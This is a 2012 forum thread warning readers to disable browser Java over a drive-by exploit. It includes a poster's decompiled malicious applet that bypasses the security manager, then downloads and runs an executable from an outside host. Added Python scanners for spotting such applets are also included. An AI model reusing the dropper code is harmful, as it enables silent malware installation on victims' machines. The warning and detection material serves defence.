Topic: Warning - Disable your browser's Java - Malicious exploit hits web.

FYI for OP: In Safari
Preferences > Security > Enable Java [ ]
« Last Edit: August 28, 2012, 12:09:45 PM by Gambsy »

Quote
FYI for OP: In Safari
Preferences > Security > Enable JavaScript [ ]

Already been stated that JavaScript isn't the same thing.

Quote
Already been stated that JavaScript isn't the same thing.

Fixed, Java is right next to it so :S

I disabled Java and JavaScript :)


Anyway we just have to wait until Oracle releases a new patch for Java. Then we will all be safe.

Quote
I disabled Java and JavaScript :)

Anyway we just have to wait until Oracle releases a new patch for Java. Then we will all be safe.

JavaScript is not even closely comparable to Java. JavaScript is safe to use.

Quote
JavaScript is not even closely comparable to Java. JavaScript is safe to use.

Will Hotspot Shield be of any use for this situation?

Eh I enabled it anyway. Now I'm located in Mexico :-)

I reported sites using this exploit on July 10th. What I didn't provide was a mirror of the JAR file with the malicious code inside.

Here's a sample:
Code:
// Decompiler output as posted. upccqt and wjkxxobsfj are helper classes from the
// same JAR and are not shown in the thread.
public class ggtull extends Applet
{

    // Applet entry point: the drop-and-run below starts as soon as the browser
    // launches the applet, so simply loading the page is enough.
    public void start()
    {
        super.start();
        try
        {
            downloadFILE();
        }
        catch(Exception exception) { }
    }

    // Constructor: builds objects aimed at System.setSecurityManager (the
    // decompiler renders System.class as java/lang/System) and feeds them to
    // Swing through a JList; this is the stage that gets rid of the applet
    // sandbox's security manager so the download below is allowed to touch disk.
    public ggtull()
    {
        String s = "setSecurityManager";
        HashSet hashset = new HashSet();
        Expression expression = new Expression(java/lang/System, s, new Object[1]);
        hashset.add(new upccqt(java/lang/System, s, new Object[1]));
        JList jlist = new JList(new Object[] {
            new wjkxxobsfj(this, hashset)
        });
        add(jlist);
    }

    // Payload stage: fetches an executable into java.io.tmpdir and runs it.
    // Every exception is swallowed, so a failed download leaves no visible trace.
    public static void downloadFILE()
    {
        try
        {
            String s = (new StringBuilder()).append(System.getProperty("java.io.tmpdir")).append("hdgfsh.exe").toString();
            URL url = new URL("http://asancho.info/?735b218b16d6cdb8d86b4fab8e98082a");
            url.openConnection();
            InputStream inputstream = url.openStream();
            FileOutputStream fileoutputstream = new FileOutputStream(s);
            byte abyte0[] = new byte[8192];
            for(int i = 0; (i = inputstream.read(abyte0, 0, abyte0.length)) != -1;)
            {
                fileoutputstream.write(abyte0, 0, i);
            }

            inputstream.close();
            fileoutputstream.close();
            try
            {
                Runtime runtime = Runtime.getRuntime();
                runtime.exec(new String[] {
                    s
                });
            }
            catch(Exception exception1) { }
        }
        catch(Exception exception) { }
    }
}
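The decompiled applet above gives its intent away in plain strings: the security-manager target, the temp-dir property, an .exe name and a download URL. A static pass over a class file's constant pool surfaces exactly those before anything is executed. This is an added example, not code from the thread; the class-file bytes it parses are constructed inline (constant pool only, no methods) and the URL in them is a placeholder.

```python
import struct
# Constant-pool tag -> size of its fixed-width payload; Utf8 (tag 1) is variable.
_FIXED = {3: 4, 4: 4, 5: 8, 6: 8, 7: 2, 8: 2, 9: 4, 10: 4, 11: 4, 12: 4,
          15: 3, 16: 2, 17: 4, 18: 4, 19: 2, 20: 2}
# Strings the decompiled dropper above depends on; several together in one
# applet class are a triage signal worth a closer look, not proof of malice.
INDICATORS = ("setSecurityManager", "java.io.tmpdir", ".exe", "http://",
              "java/lang/Runtime")

def constant_pool_strings(data: bytes) -> list:
    """Return every CONSTANT_Utf8 entry of a .class file, in pool order."""
    if data[:4] != b"\xca\xfe\xba\xbe":
        raise ValueError("not a Java class file")
    (count,) = struct.unpack(">H", data[8:10])
    off, idx, out = 10, 1, []
    while idx < count:
        tag = data[off]
        off += 1
        if tag == 1:
            (length,) = struct.unpack(">H", data[off:off + 2])
            out.append(data[off + 2:off + 2 + length].decode("utf-8", "replace"))
            off += 2 + length
        elif tag in _FIXED:
            off += _FIXED[tag]
        else:
            raise ValueError("unknown constant tag %d at offset %d" % (tag, off - 1))
        idx += 2 if tag in (5, 6) else 1  # Long and Double take two pool slots
    return out

def triage(data: bytes) -> list:
    """Sorted list of INDICATORS that occur anywhere in the class's string pool."""
    hits = set()
    for s in constant_pool_strings(data):
        hits.update(ind for ind in INDICATORS if ind in s)
    return sorted(hits)

def _utf8(s: str) -> bytes:
    b = s.encode("utf-8")
    return b"\x01" + struct.pack(">H", len(b)) + b

def build_sample() -> bytes:
    """Constructed class-file prefix (magic, version, constant pool only) with
    the strings the decompiled applet uses; the URL is a placeholder."""
    entries = [_utf8("ggtull"), b"\x07\x00\x01",  # Class -> entry #1
               b"\x05" + bytes(8),                # Long, occupies two slots
               _utf8("setSecurityManager"), _utf8("java.io.tmpdir"),
               _utf8("hdgfsh.exe"), _utf8("http://example.invalid/?payload")]
    slots = sum(2 if e[0] == 5 else 1 for e in entries)
    return b"\xca\xfe\xba\xbe" + struct.pack(">HHH", 0, 50, slots + 1) + b"".join(entries)
```

Run `triage(build_sample())` to see the four indicators the sample trips; point `constant_pool_strings` at a real .class file to list everything a class references before deciding whether to decompile it.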

Quote
I reported sites using this exploit on July 10th. What I didn't provide was a mirror of the JAR file with the malicious code inside.

Mind sharing some sites that have had this exploit? Just to avoid them?

Wait what is this?

Code:
http://asancho.info/?735b218b16d6cdb8d86b4fab8e98082a
It's in the script file. I googled it before going to it and it doesn't exist.

Edit:
Code:
hdgfsh.exe
Googled that and it appears to be a Trojan that makes its location at C:/Windows/Temp
« Last Edit: August 28, 2012, 12:40:07 PM by Blockzillahead »

Quote
Mind sharing some sites that have had this exploit? Just to avoid them?

Useless, they've all been long gone.

See my web forgery report:

Quote
http://w2.shawar.info/noot/img.html

Has 2 frames, one that loads Forex.com and another that runs a Java applet from a remote site, that downloads and executes "security shield" malware.
http://forums.malwarebytes.org/index.php?showtopic=107641

I'm going to change some values and then test the exploit.
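The forgery report above describes a page that frames a legitimate site while a second frame pulls a Java applet from another host. The scanner below, an added example rather than anything from the thread or the report, extracts frame and applet sources from one HTML document and reports which are off-site; the sample pages are constructed and every host in them except Forex.com is a placeholder.

```python
from html.parser import HTMLParser
from urllib.parse import urlsplit

class AppletFrameScanner(HTMLParser):
    """Records where a page's frames and Java applets load from, so the layout in
    the forgery report (framed decoy site plus off-site applet) can be flagged."""

    def __init__(self, page_host):
        super().__init__()
        self.page_host = page_host.lower()
        self.frame_hosts, self.applet_hosts = [], []

    def _host(self, url):
        # Relative or empty URLs resolve to the page's own host.
        return (urlsplit(url).hostname or self.page_host).lower()

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}
        if tag in ("frame", "iframe") and a.get("src"):
            self.frame_hosts.append(self._host(a["src"]))
        elif tag == "applet" or (tag in ("object", "embed") and
                                 a.get("type", "").startswith("application/x-java")):
            self.applet_hosts.append(self._host(a.get("archive") or a.get("codebase") or ""))
        elif tag == "param" and a.get("name", "").lower() == "archive":
            # <object>-style applets usually name the jar in a <param>, not an attribute.
            self.applet_hosts.append(self._host(a.get("value", "")))

def scan(html, page_host):
    """Off-site frame/applet hosts and two signals for one HTML document."""
    p = AppletFrameScanner(page_host)
    p.feed(html)
    p.close()
    return {
        "offsite_frames": sorted({h for h in p.frame_hosts if h != p.page_host}),
        "offsite_applets": sorted({h for h in p.applet_hosts if h != p.page_host}),
        "multi_host_frames": len(set(p.frame_hosts)) > 1,  # weak signal on its own
        "offsite_applet": any(h != p.page_host for h in p.applet_hosts),  # strong
    }

# Constructed pages modelled on the report: the outer frameset shows Forex.com and
# hides a second frame; the inner page pulls a 1x1 applet jar from a third host.
OUTER = ('<html><frameset cols="*,0"><frame src="http://www.forex.com/">'
         '<frame src="http://inner.example/img2.html"></frameset></html>')
INNER = ('<html><body><applet code="ggtull.class" archive="http://jar.example/x.jar"'
         ' width="1" height="1"></applet></body></html>')
```

Scanning the outer page only shows the two-host frame layout; the applet itself is only visible once the framed page is fetched and scanned with its own host name, so a crawler has to follow the frames.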

Quote
Useless, they've all been long gone.

See my web forgery report:

I'm going to change some values and then test the exploit.

Um is it safe to go to those sites if they exist?

Quote
Wait what is this?

Code:
http://asancho.info/?735b218b16d6cdb8d86b4fab8e98082a
It's in the script file. I googled it before going to it and it doesn't exist.

99% sure that it's the script file, it's in the downloadFILE function and it's declaring that as a URL object and starting a connection with it.
Just my assumption as a novice programmer though.

Quote
Um is it safe to go to those sites if they exist?

Not if you have Java enabled.

Quote
99% sure that it's the script file, it's in the downloadFILE function and it's declaring that as a URL object and starting a connection with it.
Just my assumption as a novice programmer though.

Oh I see.

Damn, is there any way to know a site has this exploit in it? Or is it just luck to find it?